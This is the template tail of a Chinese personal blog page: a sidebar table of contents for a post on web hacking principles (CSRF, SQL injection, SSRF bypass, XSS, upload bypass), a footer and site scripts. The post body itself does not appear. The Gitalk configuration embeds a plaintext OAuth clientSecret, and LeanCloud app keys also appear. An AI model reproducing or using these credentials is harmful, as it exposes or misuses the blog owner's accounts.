                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/">
                <span class="site-state-item-count">32</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
        
        

        <div class="links-of-author motion-element">
          
            
              
              
              <span class="links-of-author-item">
                <a href="https://github.com/631068264" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              
              
              <span class="links-of-author-item">
                <a href="https://stackoverflow.com/users/5360312/wyx" target="_blank" title="StackOverflow">
                  
                    <i class="fa fa-fw fa-stack-overflow"></i>
                  
                  StackOverflow
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            








            
              <div class="post-toc-content">
    <ol class=nav>
      <li class="nav-item nav-level-1"> <a class="nav-link" href="#信息"> <span class="nav-number">1</span> <span class="nav-text">信息</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#ip"> <span class="nav-number">2</span> <span class="nav-text">ip</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#目录"> <span class="nav-number">3</span> <span class="nav-text">目录</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#csrf"> <span class="nav-number">4</span> <span class="nav-text">CSRF</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-2"> <a class="nav-link" href="#tar"> <span class="nav-number">4.1</span> <span class="nav-text">tar</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#防策略"> <span class="nav-number">4.2</span> <span class="nav-text">防策略</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-3"> <a class="nav-link" href="#http-referer"> <span class="nav-number">4.2.1</span> <span class="nav-text">HTTP Referer</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#csrf-token"> <span class="nav-number">4.2.2</span> <span class="nav-text">csrf token</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#header-中自定义属性并验证"> <span class="nav-number">4.2.3</span> <span class="nav-text">Header 中自定义属性并验证</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#summary"> <span class="nav-number">4.2.4</span> <span class="nav-text">summary</span> </a> </li> </ol> </li> </ol> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#sql-注入"> <span class="nav-number">5</span> <span class="nav-text">SQL 注入</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-2"> <a class="nav-link" href="#基于-回显"> <span class="nav-number">5.1</span> <span class="nav-text">基于 回显</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-3"> <a class="nav-link" href="#注入点"> <span class="nav-number">5.1.1</span> <span class="nav-text">注入点</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#列数"> <span class="nav-number">5.1.2</span> <span class="nav-text">列数</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#用户-db"> <span class="nav-number">5.1.3</span> <span class="nav-text">用户 db</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#表数量"> <span class="nav-number">5.1.4</span> <span class="nav-text">表数量</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#表名"> <span class="nav-number">5.1.5</span> <span class="nav-text">表名</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#表的列数量"> <span class="nav-number">5.1.6</span> <span class="nav-text">表的列数量</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#表列名"> <span class="nav-number">5.1.7</span> <span class="nav-text">表列名</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#行数"> <span class="nav-number">5.1.8</span> <span class="nav-text">行数</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#记录"> <span class="nav-number">5.1.9</span> <span class="nav-text">记录</span> </a> </li> </ol> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#基于-bool"> <span class="nav-number">5.2</span> <span class="nav-text">基于 bool</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-3"> <a class="nav-link" href="#查询用户及数据库名称"> <span class="nav-number">5.2.1</span> <span class="nav-text">查询用户及数据库名称</span> </a> </li> </ol> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#sqlmap"> <span class="nav-number">5.3</span> <span class="nav-text">sqlmap</span> </a> </li> </ol> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#ssrf"> <span class="nav-number">6</span> <span class="nav-text">SSRF</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-2"> <a class="nav-link" href="#漏洞可能性"> <span class="nav-number">6.1</span> <span class="nav-text">漏洞可能性</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#排除ssrf"> <span class="nav-number">6.2</span> <span class="nav-text">排除ssrf</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#绕过方法"> <span class="nav-number">6.3</span> <span class="nav-text">绕过方法</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-3"> <a class="nav-link" href="#url-绕过"> <span class="nav-number">6.3.1</span> <span class="nav-text">URL 绕过</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#ip-转换"> <span class="nav-number">6.3.2</span> <span class="nav-text">ip 转换</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#url-跳转"> <span class="nav-number">6.3.3</span> <span class="nav-text">URL 跳转</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#短网址"> <span class="nav-number">6.3.4</span> <span class="nav-text">短网址</span> </a> </li> </ol> </li> </ol> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#xss"> <span class="nav-number">7</span> <span class="nav-text">XSS</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-2"> <a class="nav-link" href="#攻击方式"> <span class="nav-number">7.1</span> <span class="nav-text">攻击方式</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#反射型"> <span class="nav-number">7.2</span> <span class="nav-text">反射型</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#存储型"> <span class="nav-number">7.3</span> <span class="nav-text">存储型</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#xss平台"> <span class="nav-number">7.4</span> <span class="nav-text">xss平台</span> </a> </li> </ol> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#第三方漏洞"> <span class="nav-number">8</span> <span class="nav-text">第三方漏洞</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#口令爆破"> <span class="nav-number">9</span> <span class="nav-text">口令爆破</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#提权"> <span class="nav-number">10</span> <span class="nav-text">提权</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#越权"> <span class="nav-number">11</span> <span class="nav-text">越权</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-2"> <a class="nav-link" href="#信息遍历"> <span class="nav-number">11.1</span> <span class="nav-text">信息遍历</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-3"> <a class="nav-link" href="#burp-爆破"> <span class="nav-number">11.1.1</span> <span class="nav-text">burp 爆破</span> </a> </li> </ol> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#隐藏式后台"> <span class="nav-number">11.2</span> <span class="nav-text">隐藏式后台</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#绕过"> <span class="nav-number">11.3</span> <span class="nav-text">绕过</span> </a> </li> </ol> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#上传文件"> <span class="nav-number">12</span> <span class="nav-text">上传文件</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-2"> <a class="nav-link" href="#绕过-content-type限制"> <span class="nav-number">12.1</span> <span class="nav-text">绕过 Content-type限制</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#检验-文件后缀名"> <span class="nav-number">12.2</span> <span class="nav-text">检验 文件后缀名</span> </a> </li> </ol> </li>
    </ol>
  </div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>

        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  
  &copy;  2018 - 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">wyx</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://jekyllrb.com">Jekyll</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/simpleyyt/jekyll-theme-next">
    NexT.Mist
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>





















  
   
  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/jquery/index.js?v=2.1.3"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/assets/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/assets/js/src/motion.js?v=5.1.1"></script>



  
  

  <script type="text/javascript" src="/assets/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/assets/js/src/post-details.js?v=5.1.1"></script>


  


  <script type="text/javascript" src="/assets/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  






<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
<script type="text/javascript">
    var labels = ['gitalk','2019-01-27']
</script>

<script type="text/javascript">
    labels.push('hack');
</script>


<script type="text/javascript">
    labels.push('web hack');
</script>


<script type="text/javascript">
    var gitalk = new Gitalk({
        clientID: 'dd688ffd2be8512fc659',
        clientSecret: '483255bda7b80acb108df487ac91a0be78710b0d',
        repo: '631068264.github.io',
        owner: '631068264',
        admin: ['631068264'],
        id: 'Web Hack 原理',
        title: 'Web Hack 原理',
        labels: labels,
        perPage: 50,
        distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
</script>







  




  

    

  







  


  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("MQfAJm2nTUDaT5bEuS8i4Ygm-gzGzoHsz", "m4tqv3N9AepVgTk0YfSNe9kz");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  


  
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


  

  

  <!--custom css in _sass/_custom/custom.scss -->

<script type="text/javascript">
    // 黑幕提示语
    $('span.heimu').attr('title', '你知道得太多了');
</script>

<script type="text/javascript">
    // 多图显示 gp-列数
    $('span[class^="gp-"]').each(function () {
        var div_mulp = $(this);
        if (div_mulp && div_mulp.attr('class')) {
            var column_number = parseInt(div_mulp.attr('class').split('-')[1]);
            var image = div_mulp.find('img');
            if (image.size() > 0) {
                div_mulp.removeClass()
                    .addClass('post-gallery')
                    .attr('itemscope', '')
                    .attr('itemtype', 'http://schema.org/ImageGallery');

                image.each(function (index) {
                    var modulo = index % column_number;

                    if (modulo === 0) {
                        content = $('<div class="post-gallery-row"></div>')
                    }
                    var image_src = $(this).attr('src');
                    content.append('<a class="post-gallery-img fancybox"\n' +
                        '                 href="' + image_src + '" rel="gallery_"\n' +
                        '                 itemscope itemtype="http://schema.org/ImageObject" itemprop="url">\n' +
                        '                <img src="' + image_src + '" itemprop="contentUrl"/>\n' +
                        '              </a>');

                    if (modulo === column_number - 1) {
                        div_mulp.append(content)
                    }
                });

                var photo_size_modulo = image.size() % column_number;
                if (photo_size_modulo > 0) {
                    div_mulp.append(content);
                }
                image.remove();
            }
        }
    });


</script>
</body>
</html>

